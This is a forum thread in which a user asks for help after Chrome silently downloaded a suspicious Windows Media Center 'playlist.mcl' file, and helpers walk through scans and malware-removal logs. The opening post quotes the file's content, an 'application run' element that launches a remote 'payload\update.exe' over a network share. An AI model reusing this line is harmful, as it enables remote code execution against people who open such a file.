Author Topic: .mcl Virus?  (Read 12998 times)

0 Members and 1 Guest are viewing this topic.

REDACTED

  • Guest
.mcl Virus?
« on: October 13, 2015, 10:42:44 PM »
I was on Google Chrome, when suddenly and randomly a file named "playlist.mcl" notified as downloaded at the bottom of the screen. I closed Chrome immediately.

I copied it to an old laptop and opened it with Notepad. When opened in notepad it reads:

<application run="\\XX.XX.XX.XX(I have removed the numbers in case they amount to personal info, don't know what they are)\Users\Administrator\Desktop\payload\update.exe"/>

It says .mcl is a file type associated with Windows Media Center.

I hope I've done the right (read: okay) thing so far, but was very shocked that Chrome downloaded this without my permission and don't know what to do now.

REDACTED

  • Guest
Re: .mcl Virus?
« Reply #1 on: October 13, 2015, 10:45:14 PM »
Hi,

Try to send : http://www.virustotal.com and paste the link

REDACTED

  • Guest
Re: .mcl Virus?
« Reply #2 on: October 13, 2015, 10:52:21 PM »
Not sure what you mean. I assume you mean run the scan on that site and post the results?
I'm scared to open Chrome!

REDACTED

  • Guest
Re: .mcl Virus?
« Reply #3 on: October 13, 2015, 11:45:12 PM »
Okay, I tested it on the site you mentioned.

It seems to think it is fine (lots of green ticks), but it evidently isn't.

Interestingly, it says the same file has been submitted before: the last time being 5 hours ago -- but the first time it was ever submitted? Only 1 day, 1 hour ago!

Offline Pondus

  • Probably Bot
  • ****
  • Posts: 37529
  • Not a avast user
Re: .mcl Virus?
« Reply #4 on: October 13, 2015, 11:49:49 PM »
can you post the virustotal scan link




REDACTED

  • Guest
Re: .mcl Virus?
« Reply #6 on: October 14, 2015, 12:07:53 AM »
The part that worries me the most is how it downloaded itself like that!

Offline Pondus

  • Probably Bot
  • ****
  • Posts: 37529
  • Not a avast user
Re: .mcl Virus?
« Reply #7 on: October 14, 2015, 12:09:20 AM »
seems ok, was you on any music / video download site?     


if you want a check ....


Instructions  https://forum.avast.com/index.php?topic=53253.0
Attach Malwarebytes and Farbar Recovery Scan Tool logs ....  3 logs total


See below the box you write in ... Attachments and other options


malware expert team will be online tomorrow and assist you



REDACTED

  • Guest
Re: .mcl Virus?
« Reply #8 on: October 14, 2015, 12:15:52 AM »
I had a lot of tabs open, but nothing out of the ordinary, no music or video download site, unless you count YouTube as one!

I will try those scans, but removing this file itself is easy. I want to know how it downloaded itself most of all, I didn't know that was possible!

REDACTED

  • Guest
Re: .mcl Virus?
« Reply #9 on: October 14, 2015, 12:30:16 AM »
http://blog.trendmicro.com/trendlabs-security-intelligence/windows-media-center-hacking-team-bug-fixed-in-september-2015-patch-tuesday/

I feel like this is relevant. I think the file isn't being picked up as problematic or malicious because it is normally a harmless file type...

REDACTED

  • Guest
Re: .mcl Virus?
« Reply #10 on: October 14, 2015, 01:09:59 AM »
Here's the Malwarebytes one...

REDACTED

  • Guest
Re: .mcl Virus?
« Reply #11 on: October 14, 2015, 01:36:38 AM »
Just checking I'm supposed to post the next ones (FRST.txt and Addition.txt) here, it looks like information that shouldn't be shared, but I don't know anything. :P

Offline mikaelrask

  • Avast Evangelist
  • Super Poster
  • ***
  • Posts: 1556
Re: .mcl Virus?
« Reply #12 on: October 14, 2015, 07:35:36 AM »
hey lupin yes please also attach the logs from frst+addation. A malwre expert will help you from there :)
Windows 8.1 amd a10-5700 64 bit
12 GB ram 1 tb hard drive. Avast 18, MBAM

Offline Pondus

  • Probably Bot
  • ****
  • Posts: 37529
  • Not a avast user
Re: .mcl Virus?
« Reply #13 on: October 14, 2015, 09:19:37 AM »
When malware expert is done you can edit post and delete logs if you want


REDACTED

  • Guest
Re: .mcl Virus?
« Reply #14 on: October 14, 2015, 07:20:19 PM »
Okay, here they are.
I have removed a couple of unrelated personal documents from one of them, but otherwise kept them as is.

I hope they help figure out the situation.